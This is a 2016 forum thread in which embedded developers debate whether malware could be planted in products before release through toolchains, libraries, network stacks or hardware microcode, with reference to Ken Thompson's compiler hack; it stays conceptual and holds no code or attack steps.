A group of colleagues and I regularly meet up (somewhere) a few
times, annually, to exchange ideas and libations. It was my turn
to host this past week.
Lots of stuff gets discussed at these get-togethers -- which, of
course, is the reason for the "inconvenience" of having to fly around
the country to attend them!
One idea that developed over a dinner was the possibility of a
*developer* (business/individual) being targeted prior to product
release. I.e., to embed malware in the product AS RELEASED ("infected
from birth").
We're all "bare metal" developers (hardware and software). As a result,
we INITIALLY were relatively confident in ASSUMING that we would pose a
less "accommodating" attack surface for a blind "pre-release" attack;
the attacker would have no foreknowledge of the development language,
target OS, even the processor family in use!
OTOH, folks building on Windows, Linux or any other COTS platform could
probably be easily identified (fingerprint the file names in their
repository) and silently infected. Furthermore, as most of those folks
would probably be relying on many prebuilt libraries, one of those binary
packages could be infected and not be detected before linking (static or
dynamic).
[Does your build system know if a file has been altered since the last
make(1)? Or, does it simply rely on a timestamp to determine this??]
For COTS systems, the developer might not even have the sources
available for the library that is targeted! I.e., "make world"
leaves the library files untouched!
OTOH, most of us use toolchains that are publicly available (COTS
or FOSS) so the tools themselves could be targeted to inject the
specific malware into the objects -- regardless of whether or not the
binaries are ever rebuilt! (e.g., in the spirit of Ken Thompson's
hack).
Again, I suspect this is practically impossible for the GENERIC class
of embedded apps -- the attacker has no way of knowing WHICH aspect(s)
of a particular design to target!
The more interesting question is whether or not some "common" facility
(e.g., some part of stdio/stdlib/math/etc.) could be compromised in
a manner that would yield an effective "in" for a system of UNKNOWN
(to the attacker) capabilities/functionality. At the same time,
remaining innocuous enough that it doesn't prematurely reveal itself to
developers of systems that CAN'T be compromised by that technique!
(I.e., if folks started noticing that, for example, strlen(3c) was
"misbehaving" and explored the issue, they would discover such an
attack before it had the opportunity to "bear fruit" -- in some OTHER
system/product/application)
So, given NO knowledge of the targeted application domain, hardware,
OS, etc., can you imagine a PRACTICAL exploit that would put designs
at risk, "from birth"?
Possible "attack surface" pre-release exploit?
Started by ●October 2, 2016
Reply by ●October 2, 20162016-10-02
On Sun, 02 Oct 2016 03:56:43 -0700, Don Y wrote:> A group of colleagues and I regularly meet up (somewhere) a few times, > annually, to exchange ideas and libations. It was my turn to host this > past week. > > Lots of stuff gets discussed at these get-togethers -- which, of course, > is the reason for the "inconvenience" of having to fly around the > country to attend them! > > One idea that developed over a dinner was the possibility of a > *developer* (business/individual) being targeted prior to product > release. I.e., to embed malware in the product AS RELEASED ("infected > from birth"). > > We're all "bare metal" developers (hardware and software). As a result, > we INITIALLY were relatively confident in ASSUMING that we would pose a > less "accommodating" attack surface for a blind "pre-release" attack; > the attacker would have no foreknowledge of the development language, > target OS, even the processor family in use! > > OTOH, folks building on Windows, Linux or any other COTS platform could > probably be easily identified (fingerprint the file names in their > repository) and silently infected. Furthermore, as most of those folks > would probably be relying on many prebuilt libraries, one of those > binary packages could be infected and not be detected before linking > (static or dynamic). > > [Does your build system know if a file has been altered since the last > make(1)? Or, does it simply rely on a timestamp to determine this??] > > For COTS systems, the developer might not even have the sources > available for the library that is targeted! I.e., "make world" > leaves the library files untouched! > > OTOH, most of us use toolchains that are publicly available (COTS or > FOSS) so the tools themselves could be targeted to inject the specific > malware into the objects -- regardless of whether or not the binaries > are ever rebuilt! (e.g., in the spirit of Ken Thompson's hack). > > Again, I suspect this is practically impossible for the GENERIC class of > embedded apps -- the attacker has no way of knowing WHICH aspect(s) of a > particular design to target! > > The more interesting question is whether or not some "common" facility > (e.g., some part of stdio/stdlib/math/etc.) could be compromised in a > manner that would yield an effective "in" for a system of UNKNOWN (to > the attacker) capabilities/functionality. At the same time, remaining > innocuous enough that it doesn't prematurely reveal itself to developers > of systems that CAN'T be compromised by that technique! > > (I.e., if folks started noticing that, for example, strlen(3c) was > "misbehaving" and explored the issue, they would discover such an attack > before it had the opportunity to "bear fruit" -- in some OTHER > system/product/application) > > So, given NO knowledge of the targeted application domain, hardware, > OS, etc., can you imagine a PRACTICAL exploit that would put designs at > risk, "from birth"?The Ken Thompson C compiler hack http://c2.com/cgi/wiki?TheKenThompsonHack was pretty good at persisting on Unix systems. Regards, Allan
Reply by ●October 2, 20162016-10-02
On 10/2/2016 4:16 AM, Allan Herriman wrote:>> OTOH, most of us use toolchains that are publicly available (COTS or >> FOSS) so the tools themselves could be targeted to inject the specific >> malware into the objects -- regardless of whether or not the binaries >> are ever rebuilt! (e.g., in the spirit of Ken Thompson's hack).----------------------------------------------^^^^^^^^^^^^^^>> So, given NO knowledge of the targeted application domain, hardware, >> OS, etc., can you imagine a PRACTICAL exploit that would put designs at >> risk, "from birth"? > > The Ken Thompson C compiler hack > http://c2.com/cgi/wiki?TheKenThompsonHack > was pretty good at persisting on Unix systems.But I can't see it extensible beyond a system that has a "login(1)" executable! E.g., I'd wager I could use HIS hacked compiler today and it's exploit would never manifest (because my authentication scheme is entirely different; there's no concept of a "login" -- despite the system being designed for security!) (His exploit only worked because he was targeting a very specific application. I'd imagine it could be defeated by globally substituting "account" for "login" in the entire source tree.) I think the amount of heuristics required to attack a GENERIC system are simply too great for a general purpose "infestation". E.g., my visiting colleagues, KNOWING the nature of my project (or any of the projects of the other colleagues) could spend days WITH my sources and still find it difficult to "infect" them in a way that would persist (and not be detected!) until "release". Ask them to come up with an attack plan with NO knowledge of the system and they'd be helpless!
Reply by ●October 2, 20162016-10-02
On 02.10.2016 г. 13:56, Don Y wrote:> A group of colleagues and I regularly meet up (somewhere) a few > times, annually, to exchange ideas and libations. It was my turn > to host this past week. > > Lots of stuff gets discussed at these get-togethers -- which, of > course, is the reason for the "inconvenience" of having to fly around > the country to attend them! > > One idea that developed over a dinner was the possibility of a > *developer* (business/individual) being targeted prior to product > release. I.e., to embed malware in the product AS RELEASED ("infected > from birth"). > > We're all "bare metal" developers (hardware and software). As a result, > we INITIALLY were relatively confident in ASSUMING that we would pose a > less "accommodating" attack surface for a blind "pre-release" attack; > the attacker would have no foreknowledge of the development language, > target OS, even the processor family in use! > > OTOH, folks building on Windows, Linux or any other COTS platform could > probably be easily identified (fingerprint the file names in their > repository) and silently infected. Furthermore, as most of those folks > would probably be relying on many prebuilt libraries, one of those binary > packages could be infected and not be detected before linking (static or > dynamic). > > [Does your build system know if a file has been altered since the last > make(1)? Or, does it simply rely on a timestamp to determine this??] > > For COTS systems, the developer might not even have the sources > available for the library that is targeted! I.e., "make world" > leaves the library files untouched! > > OTOH, most of us use toolchains that are publicly available (COTS > or FOSS) so the tools themselves could be targeted to inject the > specific malware into the objects -- regardless of whether or not the > binaries are ever rebuilt! (e.g., in the spirit of Ken Thompson's > hack). > > Again, I suspect this is practically impossible for the GENERIC class > of embedded apps -- the attacker has no way of knowing WHICH aspect(s) > of a particular design to target! > > The more interesting question is whether or not some "common" facility > (e.g., some part of stdio/stdlib/math/etc.) could be compromised in > a manner that would yield an effective "in" for a system of UNKNOWN > (to the attacker) capabilities/functionality. At the same time, > remaining innocuous enough that it doesn't prematurely reveal itself to > developers of systems that CAN'T be compromised by that technique! > > (I.e., if folks started noticing that, for example, strlen(3c) was > "misbehaving" and explored the issue, they would discover such an > attack before it had the opportunity to "bear fruit" -- in some OTHER > system/product/application) > > So, given NO knowledge of the targeted application domain, hardware, > OS, etc., can you imagine a PRACTICAL exploit that would put designs > at risk, "from birth"?Hi Don, if your end product uses someone else's networking stack you have no options but trust the stack provider - and their compiler provider etc. You are vulnerable/defenceless by definition. And if the product is not networked it is unlikely to be a real target anyway. You may come to realize/appreciate why I do things the way I do them :-). May be I have to put together some package for commercial consumption, how many others are there which are completely under the control of a single person in the context above. Dimiter ------------------------------------------------------ Dimiter Popoff, TGI http://www.tgi-sci.com ------------------------------------------------------ http://www.flickr.com/photos/didi_tgi/
Reply by ●October 2, 20162016-10-02
On 10/2/2016 8:13 AM, Dimiter_Popoff wrote:> if your end product uses someone else's networking stack you have > no options but trust the stack provider - and their compiler provider > etc. You are vulnerable/defenceless by definition.That;s the case with *any* "component" in your design. And, it doesn't imply that your "supplier" is malicious; rather, that because it is now a "Standard Product" (component -- be it hardware or software), others can freely explore its operation "under cover of secrecy" and discover its weaknesses -- then, craft exploits targeting those weaknesses and use them against any of that vendor's customers!> And if the product is not networked it is unlikely to be a real target > anyway.But anything with a "data port" is effectively networked. E.g., if you have a USB port that allows folks to {up,down}load "stuff", then that's a potential attack vector: get someone to plug in a thumb drive with malware that you haven't prepared for and you're now a target.> You may come to realize/appreciate why I do things the way I do > them :-). > > May be I have to put together some package for commercial consumption, > how many others are there which are completely under the control of > a single person in the context above.Among my colleagues (see my original post), all of the *deployed* software is completely "home grown" -- no third-party libraries, OS's, etc. Of course, components with internal (factory controlled) microcode leave them vulnerable to that attack vector. And, as I said, the *tools* that we use represent another opportunity for "compromise". But, I can't see a mechanism that could be exploited "in general" to target the "pre-release" ecosystem that wouldn't need specific knowledge of the type of application, target hardware, etc. Said another way: if a capable colleague could spend a considerable amount of time examining YOUR codebase (that time being the equivalent of opcode fetches running on an AI that had infected your system), what could he/she learn that would enable them to compromise someone *else's* product? (WITHOUT being able to spend that sort of effort, there!) Sunday lunch: Finestkind!
Reply by ●October 3, 20162016-10-03
On 02.10.2016 г. 22:03, Don Y wrote:> On 10/2/2016 8:13 AM, Dimiter_Popoff wrote: >> if your end product uses someone else's networking stack you have >> no options but trust the stack provider - and their compiler provider >> etc. You are vulnerable/defenceless by definition. > > That;s the case with *any* "component" in your design. And, it doesn't > imply that your "supplier" is malicious; rather, that because it is now > a "Standard Product" (component -- be it hardware or software), others > can freely explore its operation "under cover of secrecy" and discover > its weaknesses -- then, craft exploits targeting those weaknesses and > use them against any of that vendor's customers!Hi Don, indeed "every" component of a system can do that. Well, every of sufficient complexity, that is. Resistors and caps have been known to be pretty tame these days :-). Where I put the line is between software and hardware. I cannot control the silicon - I buy it so I let it do whatever it does. Obviously just a single opcode or exception etc. can be made to invoke some function I am not aware of. I don't think I have seen symptoms of that yet but then how could I know. BUT I can control the software as long as every piece of it comes from me - from the toolchain to the end product. Leave one alien line - one alien generated opcode - in and you are on the other side of this line.>.... >> You may come to realize/appreciate why I do things the way I do >> them :-). >> >> May be I have to put together some package for commercial consumption, >> how many others are there which are completely under the control of >> a single person in the context above. > > Among my colleagues (see my original post), all of the *deployed* > software is completely "home grown" -- no third-party libraries, OS's, > etc. > > Of course, components with internal (factory controlled) microcode leave > them vulnerable to that attack vector. > > And, as I said, the *tools* that we use represent another opportunity > for "compromise". > > But, I can't see a mechanism that could be exploited "in general" to > target the "pre-release" ecosystem that wouldn't need specific knowledge > of the type of application, target hardware, etc. > > Said another way: if a capable colleague could spend a considerable > amount of time examining YOUR codebase (that time being the equivalent of > opcode fetches running on an AI that had infected your system), what could > he/she learn that would enable them to compromise someone *else's* product? > (WITHOUT being able to spend that sort of effort, there!)I think you are looking from too close at this one. Such an attack - say through the network stack or through the compiler or - to be completely out of our control - via the MAC and its DMA which may be smarter than we are told - does not need to know what the device it is attacking is. All it needs is to establish connection, just say "here I am" and let the attacker people worry about it later, when they know more about it through other channels (market popularity, espionage etc. etc.). Dimiter ------------------------------------------------------ Dimiter Popoff, TGI http://www.tgi-sci.com ------------------------------------------------------ http://www.flickr.com/photos/didi_tgi/
Reply by ●October 3, 20162016-10-03
Dimiter_Popoff <dp@tgi-sci.com> writes:> indeed "every" component of a system can do that. Well, every of > sufficient complexity, that is. Resistors and caps have been known > to be pretty tame these days :-).You have some device with two terminals that says "resistor" or "capacitor" on the package. How do you know what it -really- does? You obviously can't tell merely by testing. I once bought a "random parts" box that included a number of resistors that were accompanied by X-ray pictures of the resistors. I figured at the time that the X-rays were to check for defects in the resistor material, but I guess it could also have been to check for hidden microprocessors. Of course now that X-ray machines are digital, they can be backdoored...
Reply by ●October 3, 20162016-10-03
On 03.10.2016 г. 09:18, Paul Rubin wrote:> Dimiter_Popoff <dp@tgi-sci.com> writes: >> indeed "every" component of a system can do that. Well, every of >> sufficient complexity, that is. Resistors and caps have been known >> to be pretty tame these days :-). > > You have some device with two terminals that says "resistor" or > "capacitor" on the package. How do you know what it -really- does? You > obviously can't tell merely by testing. > > I once bought a "random parts" box that included a number of resistors > that were accompanied by X-ray pictures of the resistors. I figured at > the time that the X-rays were to check for defects in the resistor > material, but I guess it could also have been to check for hidden > microprocessors. Of course now that X-ray machines are digital, they > can be backdoored... >Indeed so :-). My perception of what is tame may well be outdated.... I suppose we will have to use just bleeding edge passive parts to minimize the space they have to build in trojan horses inside... :). And/or build our own xray machines of course. Dimiter
Reply by ●October 3, 20162016-10-03
Hi Dimiter, On 10/2/2016 10:58 PM, Dimiter_Popoff wrote:> indeed "every" component of a system can do that. Well, every of > sufficient complexity, that is. Resistors and caps have been known > to be pretty tame these days :-). > Where I put the line is between software and hardware. > I cannot control the silicon - I buy it so I let it do whatever it > does. Obviously just a single opcode or exception etc. can be made > to invoke some function I am not aware of. I don't think I have > seen symptoms of that yet but then how could I know.But, more and more "bits of hardware" are becoming "programmed state machines". E.g., newer NIC's are essentially specialized processors with their own microcode, etc. And, of course, *processors* now have writeable control stores... (welcome to the past! :> )> BUT I can control the software as long as every piece of it comes > from me - from the toolchain to the end product. Leave one alien > line - one alien generated opcode - in and you are on the other side > of this line.Yes, but (I suspect) in practical terms (at least for toolchains), I doubt there is much risk. I.e., a smart malware could inject code into any library function you have on your system to virtually GUARANTEE that the code fragments *will* get executed at some time while your product is "running". (a malevolent bit of the toolchain just has more opportunities to do this!) Yet, without some knowledge of what your code is trying to do, it's hard to imagine such an exploit being effective -- BEFORE being discovered in some case where it interfered with normal operation of the device (e.g., anyone watching code execute with a logic analyzer would be able to notice this injected code -- no way the code could know that the bus was being snooped by such a device!) Infections seem to try to target higher levels in devices/products/systems... places where the functionality of the embodying code is reasonably well known (e.g., a network stack, a system utility, etc.). E.g., memcpy(3c) (or, worse, copyin/out) is undoubtedly used in lots of places where it *could* significantly affect the operation of the device. But, it, by itself, doesn't have any awareness of the semantic value of each invocation... doesn't know if the arguments point to special kernel buffers or just a line of text for an error message. OTOH, res_mkquery(3) has a much more refined role in a system!>>> You may come to realize/appreciate why I do things the way I do >>> them :-). >>> >>> May be I have to put together some package for commercial consumption, >>> how many others are there which are completely under the control of >>> a single person in the context above. >> >> Among my colleagues (see my original post), all of the *deployed* >> software is completely "home grown" -- no third-party libraries, OS's, >> etc. >> >> Of course, components with internal (factory controlled) microcode leave >> them vulnerable to that attack vector. >> >> And, as I said, the *tools* that we use represent another opportunity >> for "compromise". >> >> But, I can't see a mechanism that could be exploited "in general" to >> target the "pre-release" ecosystem that wouldn't need specific knowledge >> of the type of application, target hardware, etc. >> >> Said another way: if a capable colleague could spend a considerable >> amount of time examining YOUR codebase (that time being the equivalent of >> opcode fetches running on an AI that had infected your system), what could >> he/she learn that would enable them to compromise someone *else's* product? >> (WITHOUT being able to spend that sort of effort, there!) > > I think you are looking from too close at this one. Such an attack - say > through the network stack or through the compiler or - to be completely > out of our control - via the MAC and its DMA which may be smarter than > we are told - does not need to know what the device it is attacking is. > All it needs is to establish connection, just say "here I am" and let > the attacker people worry about it later, when they know more about it > through other channels (market popularity, espionage etc. etc.).But an arbitrary (infected) piece of code can't KNOW how to access the NIC in any "random" piece of hardware (unless it is embedded in a piece of code known to talk to that hardware device!). Just like a piece of code that computes the hash of a password can't know that the string that it is examining *is* a password (unless that piece of code resides in a function named "hash_user's_password()"!) As such, codebases that can indirectly be examined "from afar" -- because they incorporate COTS or FOSS modules of known characteristics -- are the only viable attack vectors (at least, that's my contention!). If I label my functions: function_0001() ... function_0002() ... function_0003() ... an attacker would have no idea if function_0001() wasn't, in fact, "hash_user's_password()"!
Reply by ●October 3, 20162016-10-03
On 03.10.2016 г. 10:15, Don Y wrote:>.... >> BUT I can control the software as long as every piece of it comes >> from me - from the toolchain to the end product. Leave one alien >> line - one alien generated opcode - in and you are on the other side >> of this line. > > Yes, but (I suspect) in practical terms (at least for toolchains), I > doubt there is much risk.Hi Don, my point is exactly that once this line has been crossed it gets a matter of trust vs. doubt. I cannot speculate on the probabilities, in fact I don't think anyone of use here can unless directly involved in such work for some agency. What is done there is just beyond my horizon and, frankly, beyond my interest. I just stay on my side of the line.>> >> I think you are looking from too close at this one. Such an attack - say >> through the network stack or through the compiler or - to be completely >> out of our control - via the MAC and its DMA which may be smarter than >> we are told - does not need to know what the device it is attacking is. >> All it needs is to establish connection, just say "here I am" and let >> the attacker people worry about it later, when they know more about it >> through other channels (market popularity, espionage etc. etc.). > > But an arbitrary (infected) piece of code can't KNOW how to access the > NIC in any "random" piece of hardware (unless it is embedded in a piece > of code known to talk to that hardware device!).Uhm, yes but platform discovery becomes less and less difficult as the choices of silicon get narrower and narrower. I would not bet a lot on that. Dimiter ------------------------------------------------------ Dimiter Popoff, TGI http://www.tgi-sci.com ------------------------------------------------------ http://www.flickr.com/photos/didi_tgi/







